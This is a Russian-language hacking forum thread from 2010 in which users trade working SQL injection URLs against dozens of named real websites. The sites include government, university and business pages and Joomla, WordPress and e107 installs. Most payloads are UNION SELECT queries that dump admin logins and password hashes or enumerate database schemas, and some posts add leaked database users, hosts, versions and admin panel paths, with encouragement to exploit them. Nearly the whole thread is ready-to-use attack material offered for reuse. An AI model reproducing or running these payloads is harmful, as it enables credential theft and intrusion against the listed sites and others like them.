Просмотр полной версии : SQL Инъекции
http://smu17.ru/stol.php?id=-1+union+select+1,concat(LOGIN,0x3a,PASS)+from+kapi tal_zed_users+limit+0,1--
Tic-30 админка /zed/
PS. через эту же скулю еще сотня соседей. Дерзайте
DarkDante
04.10.2010, 14:16
PHP:
http://blinginbox.com/product.php?cateId=10&sx=-15+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16--
Code:
http://www.yuzhnoye.com/?id=14'%20and%20substring(version(),1,1)=5--%201&path=about_company/history/missiles/missiles
Code:
http://www.sportware.ru/?id=-91+and+1=0+union+select+1,2,version(),4,5,6,7--
Code:
http://www.multi-master.ru/service/detail.php?id=-10+union+select+1,version(),3--
Code:
http://www.irancivilcenter.com/en/news/view.php?news_id=-3+union+select+concat_ws%280x3a,user%28%29,version %28%29,database%28%29%29,2,3,4,5--
Username: iranciv_icc82m@localhost
Version: 5.0.91-community
Database: iranciv_news
Google PR: 5
http://danlempriere.com/articles.php?id=2+and+substring((select+1),1,1)=tr ue
MDB2
нету прав нa mdb2 schema
http://www.simport.ru/?page=3&id=2+and+1=0+union+select+1,2,group_concat%28table _name%29,4,5,6,7+from+information_schema.tables+wh ere+table_schema=database%28%29+--+
Дырявая джумла:
--------------------------------------------------------------------------
http://www.reynoldsburgchurch.org/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,3,4,concat_ws%280x3a ,username,p ass word%29,6,7+from+jos_users--
--------------------------------------------------------------------------
http://www.pokermachinez.com/index.php? option=com_dcs_flashgames&Itemid=61&catid=51+union+all+select+1,2,user%28%29,4,@@versi on,6,concat_ws%280x3a,username,p ass word%29+from+jos_users--
--------------------------------------------------------------------------
http://www.sinab.gov.ec/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12, 1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3, 3,3,3,4,4,4,4,concat%280x1e,usernam e,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it
--------------------------------------------------------------------------
http://www.sitgesrestaurantes.com/index.php?option=com_restaurante&task=detail&Itemid=1&id=-99999+UNION+SELECT+0,0,0x3a,0,0,0,0,0,0,0,0,11,12, 1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3, 3,3,3,4,4,4,4,concat%280x1e,us ername,0x3a,p ass word,0x1e,0x3a,usertype,0x1e%29+FROM+jos_users--&lang=it
--------------------------------------------------------------------------
http://www.sobakavdome.ru/index.php?option=com_iss&task=expotag&id=602+and+1=0+union+select+0,1,2,3,4,group_concat %28us ername,0x3a,p ass word,0x3a,email%29+from+jos_users--
--------------------------------------------------------------------------
The Elusive
05.10.2010, 16:03
Code:
http://isfav.it/index.php?pag=materie&id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct% 20concat(0x7e,0x27,Hex(cast(schema_name%20as%20cha r)),0x27,0x7e)%20FROM%20information_schema.schemat a%20LIMIT%202,1),0x31303235343830303536--
База isfav_db2
И пара других там еще есть =)
PR 4
Бажный водпресс:
---------------------------------------------------------------------------
http://www.chicasrider.cl/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,use r_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(user_login,0x3a,u ser_p ass),4+from+wp_users--
(Уникальная вещь для меня, первый раз получилось через админ.пхп скулю провести)
P.S. Сервак виндовый
---------------------------------------------------------------------------
http://www.kfir.co.il/news.php?id=23+and+1=0+union+select+1,group_concat (u ser_login,0x3a,user_p ass),3,4,5,6,7,8,9+from+wp_users--
---------------------------------------------------------------------------
http://www.topbeauty.ro/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(0x3a,u ser_login,0x3a,user_p ass),6,7,8+from+wp_users--
---------------------------------------------------------------------------
http://www.bulldogdesigninc.com/News.php?id=12+AND+1=2+UNION+SELECT+0,1,2,3,group_ concat(user_login,0x3a,user_pass),5%20from%20wp_us ers--
---------------------------------------------------------------------------
http://www.jeremybouma.net/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://staroftheseakeywest.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://cycling4fun.com/wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user _pass,0x3a,user_email),3,4,5,6%20from%20wp_users--
---------------------------------------------------------------------------
http://www.giveawayriches.com/jvblog/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,n ull,concat(0x7c,user_login,0x7c,u ser_p ass,0x7c),null,null,null,null,null,null,null,null% 20%20from%20wp_users
---------------------------------------------------------------------------
З.Ы. Блин, да сколько же дырок-то....
DezMond™
05.10.2010, 21:27
www.bayern-international.de тИЦ — 10 PR — 6
Code:
http://www.bayern-international.de/nc/en/business-in-bavaria/key-technologies-in-bavaria/company-details.html?tx_hbkeytech_pi2%5BfirmaID%5D=-28997'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,group_concat(table_name)+ from+information_schema.tables+group+by+table_sche ma+limit+1,1+--+&tx_hbkeytech_pi2%5BkeyTechID%5D=20'
www.blankom.de тИЦ — 10 PR — 3
Code:
http://www.blankom.de/index.php?id=245&tx_osdbproducts_pi1[cid1]=35&tx_osdbproducts_pi1[cid2]=85&tx_osdbproducts_pi1[cid3]=-170+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26+--+&tx_osdbproducts_pi1[number]=9062.02&cHash=2116147af1&L=1
law.emory.edu тИЦ — 70 PR — 6
Code:
http://www.law.emory.edu/index.php?id=5132&tx_wfqbe_pi1%5Bid%5D=-73+union+select+1,2,3,4,table_name,6,7,8+from+info rmation_schema.tables+--+
smania.it тИЦ — 100 PR — 3
Code:
http://www.smania.it/index.php?id=52&L=1&tx_newscatmenu_pi1[parent_category]=-20+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,group_concat(concat_ws(0x3a3a,username,pas sword,admin))+from+be_users+/*+
sfx-360.com тИЦ — 10 PR — 4
Code:
http://www.sfx-360.com/index.php?idEvent=-56+union+select+1,concat_ws(0x3a3a,user_name,passw ord),3,4,5,6+from+user+--+
alucobond.eu тИЦ — 10 PR — 1
Code:
http://www.alucobond.eu/distributors-ru.html?&L=5&tx_nicosdirectory_pi1%5Bmode%5D=liste&tx_nicosdirectory_pi1%5Bmodifier%5D=cat&tx_nicosdirectory_pi1%5Bvalue%5D=-8'+union+select+1,2,3,4,5,6,7,8,9,user(),11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33+--+&tx_nicosdirectory_pi1%5Bpointer%5D=0&cHash=2e397a1d90
ofi-am.fr тИЦ — 10 PR — 4
Code:
http://www.ofi-am.fr/html/ofiWebTV.php?laVideo=/inout/video/52/trussant.flv&idVideo=-52'+union+select+1,concat_ws(0x3a3a,IDADMIN,IDENT, PASS),3,4,5,6,7,8,9,10,11,12+from+ADMIN+--+
oblivion.it тИЦ — 10 PR — 4
Code:
http://www.oblivion.it/html/obliviontv.php?idvideo=-47+union+select+1,2,user(),4,5,6,7,8+--+
habitatsis.com тИЦ — 10
Code:
http://www.habitatsis.com/html/hs_formacion/Videos.asp?IdCategoria=1011&Inmobiliaria=&IdVideo=-10022+union+select+1,2,3,4,5,6,7,8,9,10,11+from+in formation_schema.tables+--+
chasse-enligne.com тИЦ — 10 PR — 3
Code:
http://www.chasse-enligne.com/pub/redirect.php?IDPub=-16+union+select+concat_ws(0x3a3a,login,password)+f rom+admin+limit+0,1+--+
teoremaonline.it тИЦ — 10 PR — 4
Code:
http://www.teoremaonline.it/index.php?l=en&idn=33&idevent=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,concat_ws(0x3a3a,mail,password,surna me),21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39+from+privatearea_user+--+&cat=3'&onlpg=4'
bmwmcpiacenza.it тИЦ — 10
Code:
http://bmwmcpiacenza.it/index.php?obj=site&cmd=event_show&idevent=-10+union+select+1,2,3,4,user(),6,7,8+--+
www.dbugbcn.org тИЦ — 10 PR — 3
Code:
http://www.dbugbcn.org/index.php?idevent=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65 ,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,8 2,83,84,85,86,87,88,89,90,91,92,93,94+--+
cqll.be тИЦ — 10 PR — 4
Code:
http://www.cqll.be/index.php?inc=view_event.php&id=-2+union+select+1,2,concat_ws(0x3a3a,id_level,user, password),4+from+administrateur_site+--+&sid=0&idevent=165'
5aan.com тИЦ — 10
Code:
http://www.5aan.com/index.php?act=detailproduct&idevent=-36+union+select+1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3 a3a,username,password,email,permasion),12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43+from+adminuser+--+
lettera27.org тИЦ — 10 PR — 5
Code:
http://www.lettera27.org/index.php?idlanguage=1&zone=9&idprj=1483&idevent=-1528+union+select+user()+--+
А теперь е107
---------------------------------------------------------------------------
http://www.kna.edu.stockholm.se/e107_plugins/userjournals_menu/userjournals.php?blog.-9999%20union%20all%20select%201,2,3,4,5,6,u ser_p ass word,8,9,0,11,12,13%20from%20e107_user--
---------------------------------------------------------------------------
http://www.lyngholm-thy.dk/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,u ser_p ass word)KHG+from+e107_user+where+user_id=1--
---------------------------------------------------------------------------
http://www.jacksmannequin.org/e107_plugins/lyrics_menu/lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,u ser_p ass word),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_u ser--
------------------------------------------------------------------------
http://lombardo-mebelsbg.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,u ser_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://www.stephenslawncare.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://www.papagali-bg.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user--
------------------------------------------------------------------------
http://www.megalit33.ru/plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),user_name,use r_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
http://teambmecte.ru/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws(char(58),u ser_name,user_p ass word)KHG+from+e107_user+where+user_id=1--
------------------------------------------------------------------------
З.Ы. Это я свою программку проверяю хорошо трудится
http://www.ahyaqiang.com/En/news.php?id=1+and+row(1,2)in(select+count(*),conca t((select+table_name+from+information_schema.table s+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+infor mation_schema.tables+x+group+by+a)
PR: 1
user: yqdb
database: sqlyqdb
version: 5.0.90-log
Code:
http://www.bda.org.uk/news.php?action=view&news_id=-238+UNION+SELECT+1,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11+f rom+administrators--
Username: dbo298445383@212.227.29.27
Version: 5.0.91-log
Database: db298445383
Google PR: 6
Code:
http://www.russianw.com/articles/article.php?ID=-615'%20union%20select%201,2,unhex(hex(concat(logna me,0x3a,password,0x3a,email))),4,5,6,7,8,9%20from% 20exp_admin--%201
method=post
The Elusive
06.10.2010, 18:18
Code:
http://jimdunlop.com/index.php?page=products/pip&id=304%20AND%20Length((user()))=22
Google PR=5
http://okasse.ru/_Docs/doc_show.asp?docs_id=103+and+1=0+union+select+1,2, 3,4,5,group_concat(table_name),7,8+from+informatio n_schema.tables+where+table_schema='iskra-6'+--+
ТИЦ : 550
http://www.sigma-is.ru/cgi-bin/news.pl?id_news=303+and+1=0+union+select+1,2,3,4,g roup_concat(column_name),6,7,8+from+information_sc hema.columns+where+table_name='users'+--+
ТИЦ : 475
moodoone
06.10.2010, 19:28
Code:
http://www.vup.hr/index.php?file=pages/rubrika.php&id=-27+union+select+1,group_concat%28table_name%29,3,4 +from+information_schema.tables--+
Code:
http://www.sevtolib.iuf.net/index.php?id=59'%20or%201%20group%20by%20concat(ve rsion(),floor(rand(0)*2))having%20min(0)%20or%201--%201
Премиум Яхтс
http://www.premiumyachts.ru/news/?view_news=true&news_id=-111+and+1=2+union+select+1,2,3,concat_ws(0x3a,@@ve rsion,user(),database(),@@version_compile_os),5,6, 7,8+--
5.1.43-log py@localhost py portbld-freebsd7.3
spherics
07.10.2010, 12:23
http://article-publisher-pro.phparticlescript.com/rss.php?feed&c=199999999+union+select+1,2,3,concat_ws(0x3a,user (),version(),database()),5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19--&n=all&nc=all
Database Version: 5.0.77-log
Database name: 428043_article
User name: 428043_article@172.17.34.124
http://www.semda.org/info/pyramid.asp?ID=27+union+select+1,2,3,4+from+msysac cessobjects
http://www.africafiles.org/article.asp?ID=22761+or+(1,1)=(select+count(0),con cat((select+version()+from+information_schema.tabl es+limit+0,1),floor(rand(0)*2))from(information_sc hema.tables)+group+by+2)--+
http://www.behavioralhealthcarenetwork.org/profile_view.php?userid=-42+union+select+CONCAT%28user%28%29,%20CHAR%2832,4 5,32%29,%20version%28%29%29+--+
dbo252691846@74.208.16.214 - 5.0.91-log
http://www.vid.net.ua/print.php?id=-20982+union+select+1,2,concat(login,0x3a,password) ,4,5,6,7,8,9,10,11,12+from+personal+limit+0,1--
colorist
08.10.2010, 03:43
лежал под столом
http://nefart.ru/to_friend.php?id=-30004'+union+select+1,2,3,4,5,version(),7,8,9,10,1 1,12,13,14+--+
@@version = 5.0.51a-24+lenny3-log
CY = 50
PR = 3
http://www.lumstyle.ru/company/news.htm?news_id=22+and+1=0+union+Select+1,2,3,4,c oncat_ws(0x3a,login,pass),6,7+from+user+limit+0,1+--+
ТИЦ : 450
http://www.oknacm2.ru/about/news/?year=2010&month=02&id=18+and+1=0+union+select+1,2,3,4,group_concat(ta ble_name),6+from+information_schema.tables+where+t able_schema=database()+--+
ТИЦ : 400
http://www.arenabusinesscentres.com/home.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,1,concat_ws (0x3a,password,username),14,15,16,17,18,19,20,21,2 2+from+users--
http://www.4railhorsetransport.com/Home.php?id=-2+union+select+1,version()--
http://www.efimar.com/job.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4 ,5,6,7+from+information_schema.tables--
http://www.mri.ur.ru/persons.php?id=-2+union+select+1,2,3,group_concat(0x0b,username,0x 3a,user_password,0x3a,user_id),5,6,7+from+phpbb_us ers--
http://www.wowbuenosaires.com/zone.php?id=-2+union+select+1,2,3,4,5,group_concat(0x0b,table_n ame),7,8+from+information_schema.tables--
http://www.iss-reshetnev.ru/?cid=news&nid=1094+or+(select+count(*)from(select+1+union+se lect+2+union+select+3)x+group+by+concat(mid((selec t+TABLE_NAME+from+information_schema.tables+where( table_schema!=0x696E666F726D6174696F6E5F736368656D 61)limit+25,1),1,64),floor(rand(0)*2)))
ТИЦ : 425 PR: 4
Code:
http://www.biznes-pro.com/index.php?page=10&id=15225+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0, 11,12,13,14,version(),16,17--%201
http://www.motifake.com/saveas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user _password),5,6,7,8+from+mw_user+--
Искал прон с lizvicious и попал на этот сервис демотиваторов
PR: 4
http://www.assistancedogs.org.au/news.php?newsid=-17+union+select+1,2,3,group_concat(table_name),5,6 +from+information_schema.tables
http://www.tanger.am/news_all.php?news=5-1+union+select+1,2,3,group_concat(user,char(58),pa ssword),5,6+from+admin&lang=rus
http://www.iwf.net/results/results_results.php?placecod=-116+or+(1,1)=(select+count(0),concat((select+conca t_ws(0x3a,name,password)+from+users+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)+grou p+by+2)--+
http://bpascal.ru/res/down.php?download=140+and+1=9+union+select+1,versi on(),3,4,5,6,7,8,9,10
ЦЕНТРАЛИЗОВАННАЯ БИБЛИОТЕЧНАЯ СИСТЕМА г. САРАТОВА
http://library.renet.ru/cgi-bin/my_news.pl?cmd=uni&nid=-711+and+1=2+union+select+1,2,concat_ws(0x3a,@@vers ion,user(),database(),@@version_compile_os),4,5+--
4.1.22-log:library@localhost:libraryortbld-freebsd6.2
KandidaT'S
09.10.2010, 10:12
http://xtremelabs.org/index.php?location=news&url=-1+UNION+SELECT+1,2,3,concat_ws%280x3a,username,use r_password%29,5,6,7+from+xtremelabs_forums.phpbbfo rums_users+limit+1,1+--+
тИЦ: 30
http://www.upesh.edu.pk/news.php?news_id=-242+or+(select+count(*)from(select+1+union+select+ 2+union+select+3)x+group+by+concat(mid((select+ver sion()),1),floor(rand(0)*2)))--
PR 6
http://www.nortelglass.com/tools.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4 ,5,6,7,8,9,10,11,12+from+information_schema.tables--
PR 3
http://goldenflowers.ru/school/articles/?item=-14+and+1=2+union+select+1,2,3,concat_ws(char(58),@ @version,user(),database(),@@version_compile_os),5 ,6+--
5.1.41-log : vbuchnev_mysql@10.1.29.190 : vbuchnev_db : portbld-freebsd7.2
stepashka_
09.10.2010, 21:35
http://www.fitness.shop.pl/producer.php?id=-12+union+select+group_concat(column_name)+from+INF ORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x775f757 36572+--+
ТИЦ: 10
PR: 4
http://www.optsib.ru/?d=2&e9d0ff3e541008&fid=1959+and+1=0+union+select+1,group_concat(table _name+separator+'
')+from+information_schema.tables+where+table_sche ma=database()+--+
ТИЦ : 350
http://ukrmodels.com/ru/showgirl.php?id=548'%20and%201=0%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,12,table_name, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63, 64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80 ,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,9 7,98,99,100,101,102,103,104,105,106,107,108,109,11 0,111,112,113,114,115,116,117,118,119,120,121,122, 123,124,125,126,127,128,129,130%20from%20informati on_schema./*!tables*/%20limit%2035,1--%201
Украинские модельки )
http://www.mukola.net/news.php?id=28036'+and+1=0+union+select+1,2,3,grou p_concat(table_name)+from+information_schema.table s+Where+table_schema=database()+--+
ТИЦ : 850
http://pult.com.ua/news.php?id=7466&world=1+or+(select+count(*)from(select+1+union+sel ect+2+union+select+3)x+group+by+concat(mid((select +TABLE_NAME+from+information_schema.tables+where(t able_schema!=0x696E666F726D6174696F6E5F736368656D6 1)limit+8,1),1,64),floor(rand(0)*2)))
ТИЦ : 90
http://www.debts.com.ua/news.php?id=25+and+1=0+union+select+1,2,3,group_co ncat(table_name),5+from+information_schema.tables+ Where+Table_schema=database()+--+
ТИЦ : 20 PR: 4
Gemini12
10.10.2010, 19:57
http://ontariosafetyleague.com/training.php?id=-2000’+union+select+1,2,3,4,concat_ws(0x3a,versio n(),database(),user()),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20+--+
http://ontariosafetyleague.com/admin.php
http://www.artelstroy.com/index.php?house=-1170969905+union+select+1,2,concat_ws(0x3a,@@versi on,user(),database(),@@version_compile_os),4,5+--+
4.0.27-log : watcher@localhost : lehins : pc-linux-gnu
http://www.artelrb.ru/?id=23&n=-79+union+select+1,2,concat_ws(0x3a,@@version,user( ),database(),@@version_compile_os),4,5,6+--&subaction=detail&lang=
4.0.27-log vh27760@zvm15.host.ru vh27760 pc-linux-gnu
Gemini12
10.10.2010, 20:56
http://www.baranltd.com/urunler.php?tur=urun&uid=153+and+1=2+union+select+1,2,3,4,5,unhex(hex(c oncat_ws(0x3a,id,kadi,adsoy,bilgi,ip,songir,expr,s ifre))),7,8,9,10+from+kg--
http://www.mkb10.ru/?class=5&bloc=65&diag=3015+and(1=2)+union+select+version()
MySQL 5.0.90
тИЦ 10 PR 2
Gemini12
10.10.2010, 23:27
http://www.posscript.ru/index.php?id=2+and+1=2+union+select+1,version(),3, 4+--+
Очень странная скуля...
Code:
http://www.carkitinc.com/carkit2.php?id=-7+UNION+SELECT+1,2,3,concat_ws%280x3a3a,id,Name,Pa ssword%29,5,6,7,8,9,10,11,12,13,14,15,16,17+FROM+p assword+LIMIT+0,1+--+
http://minpraud.by/news.php?id=2579+and+1=0+UnIon+selECt+1,2,3,4,5,6, version(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+
http://www.ranak.by/plus/viewrp.php?id=5297+and+1=0+UnIon+selECt+1,version( ),3,4,5,6,7,8,9,10,11,12,13,14+--+
http://www.ssangyong.by/ru/pages/index.php?id=268+and+1=0+UnIon+selECt+1,2,3,4,5,6, group_concat(table_name),8,9,10,11,12,13,14,15,16, 17,18,19,20+from+information_schema.tables+where+t able_schema=0x7373616e67796f6e5f6d61696e+--+
http://www.nastgaz.by/news.php?id=450+and+1=0+UnIon+selECt+1,2,3,4,5,6,g roup_concat(table_name),8,9,10,11,12,13,14,15,16,1 7,18,19,20+from+information_schema.tables+where+ta ble_schema=database()+--+¤t_date=2010-10-07
http://www.minpraud.by/catalog.php?id=4751+and+1=0+UnIon+selECt+1,2,3,4,5 ,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20+--+¤t_date=2010-10-09
http://kosmos95.by/index.php?pageid=45+and+1=0+UnIon+selECt+1,2,3,4,5 ,6,group_concat(table_name),8,9,10,11,12,13,14,15, 16,17,18,19,20+from+information_schema.tables+wher e+table_schema=database()+--++#maintext
http://www.zaslaue.by/news.php?id=4+and+1=0+union+select+1,2,3,4,5,6,7,g roup_concat(table_name+separator+0x3c62723e)+from+ information_schema.tables+where+table_schema=datab ase()--+&lang=be
http://www.byketiki.by/catalog.php?id=33+and+1=0+UnIon+selECt+1,2,3,4,5,6 ,7,8,group_concat(table_name),10,11,12,13,14,15,16 ,17,18,19,20,21+from+information_schema.tables+whe re+table_schema=database()+--+
http://www.smarttech.by/index.php?id=6+and+1=0+UnIon+selECt+1,2,3,4,5,6,7, 8,group_concat(table_name),10,11,12,13,14,15,16,17 ,18,19,20+from+information_schema.tables+where+tab le_schema=database()+--+
http://www.polimersin.by/index.php?id=7+and+1=0+UnIon+selECt+1,2,3,4,5,6,7, 8,group_concat(table_name),10,11,12,13,14,15,16,17 ,18,19,20+from+information_schema.tables+where+tab le_schema=database()+--+
http://www.minskie-okna.ru/page.php?id=7+and+1=0+UnIon+selECt+1,2,3,4,5,6,ver sion(),8,9,10,11,12,13,14,15,16,17,18,19,2+--+
http://znakbuh.ru/index.php?id=4+and+1=0+UnIon+selECt+1,2,3,4,5,6,ve rsion(),8,9,10,11,12,13,14,15,16,17,18,19,20
http://www.asotrabel.by/news.php?id=17+and+1=0+UnIon+selECt+1,2,3,4,5,6,7, 8,group_concat(table_name),10,11,12,13,14,15,16,17 ,18,19,20+from+information_schema.tables+where+tab le_schema=database()+--+
http://sutkiminsk.by/catalog.php?rub=18+and+1=0+UnIon+selECt+1,2,3,4,5, 6,group_concat(table_name),8,9,10,11,12,13,14,15,1 6,17,18,19,20+from+information_schema.tables+where +table_schema=database()+--+&lang=ru
Не много джумлы:
http://www.ushandball.org/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat%28username,0x3a,pa ss word%29,0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 5 Cy 10
http://www.flowershow.ru/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 4 Cy 240
http://www.kadetstvo.info/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 2 Cy 100
http://www.vepsles.spb.ru/veps/index.php?option=com_rsgallery2&page=inline&id=Acrid&catid=-999999/**/union/**/select/**/0,0,0x3a,0,concat(username,0x3a,p ass word),0,0,0,0,0,0,0,0/**/from/**/jos_users
PR 5 Cy 40
http://www.vip-premier.ru/inside.php?action=statia&id=6740&pid=554+and+1=0+union+select+1,2,group_concat(tabl e_name+separator+0x3c62723e),4,5,6,7,8,9+from+info rmation_schema.tables+where+table_schema=database( )+--+
ТИЦ : 100
http://www.coaching-report.de/index.php?id=359+or+(select+count(*)from(select+1+ union+select+2+union+select+3)x+group+by+concat(mi d((select+concat(kennung,char(58),vorname,char(58) ,nachname,char(58),g_mail,char(58),passwort,char(5 8),g_firma,char(58),g_strasse,char(58),g_ort,char( 58),g_plz)+from+op4_admin+limit+0,1),1,64),floor(r and(0)*2)))
PR: 5
http://www.metal1.info/news/news.php?id=11061'+and+1=0+union+select+version()+--+
ТИЦ : 10 PR: 4
http://www.hortinews.com/news.php?id=22627'+and+1=0+UnIon+selECt+1,2,3,4,5, group_concat(table_name+separator+'
'),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+inf ormation_schema.tables+where+table_schema=0x686f72 74696e657773+--+
PR: 3
Спутниковые технологии Охранные системы
http://www.vgp.ru/?page=main_menu&id=-17+and+1=2+union+select+1,2,concat_ws(0x3a,@@versi on,user(),database(),@@version_compile_os),4,5,6,7 +--
5.0.90 : u17215@78.108.81.211 : b17215_vgp : portbld-freebsd8.1
http://www.setyan.ru/index.php?CID=24+and+1=0+union+select+1,2,3,4,grou p_concat%28table_name%29,6,7,8,9,10+from+informati on_schema.tables+where+table_schema=database%28%29 +--+
вроде не боян
http://prideatwork.org/page.php?id=5+and+1=0+union+select+concat(username ,0x3a,password),2+from+jos_users+--+
результат в исходнике
http://www.cadefoundation.org/page.php?id=4+and+1=0+union+select+1,user(),3,4,5+--+
http://www.sevlievo.net/bg/news/news.php?id=571+and+1=0+union+select+1,version(),3 +--+
4.1.22-log
ТИЦ : 10 PR: 4
http://www.shalomtv.tv/index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_c oncat(username,0x3a,password),14,15,16,17,18,19,20 ,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
дерзайте,в админку правда не могу зайти
http://www.build.kz/?page=inc/tov&subcid=1&cid=2&fidlist=136-999.9+union+select+1,2,version%28%29,4,5,6,7,8,9,1 0,11--
http://www.futerovka.ru/?cid=cl&cl=13-999.9+union+select+1,version%28%29,3,4,5,6,7,8--
DezMond™
13.10.2010, 01:23
wciom.ruтИЦ—3300 PR—6
Code:
http://wciom.ru/biblioteka/zhurnal-monitoring/arkhiv/six-ten/index.php?id=195&uid=-13887+union+select+1,2,3,group_concat(concat_ws(0x 3a3a,username,password))+from+wciom_typo3.fe_users +--+
Еще вордпресс:
http://www.pam93.info/actu.php?id=-9999999+union+select+0,1,2,3,concat%28user_login,0 x3a,user_pa ss,0x3a,user_email%29,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23+from+wp_users--
PR 6
З.Ы. Сервак виндовый
http://www.geliosco.ru/news.php?loc=1&id=-32+and+1=2+union+select+1,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),3,4,5,6,7 +--
5.0.75-log srv19722_admin@c17-w.ht-systems.ru srv19722_db portbld-freebsd7.0
http://www.geliosco.ru/news.php?loc=1&id=-32+and+1=2+union+select+1,concat(name,0x20,passwor d),3,4,5,6,7+from+admins--
http://www.begamer.ru/content.php?p=2&catId=11&id=-199'+union+select+1,2,3,4,concat_ws(0x3a3a,version (),@@version_compile_os,user(),database()),6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
http://www.phoenixrostov.ru/topics/topic/?pid=8+and+1=0+union+Select+version()+--+
4.1.20-log
ТИЦ : 160 PR: 5
http://www.officefile.ru/news_detail.php?id=872'+and+1=0+union+select+1,2,3 ,version(),5,6,7,8,9,10,11+--+
4.1.20-log
ТИЦ : 140
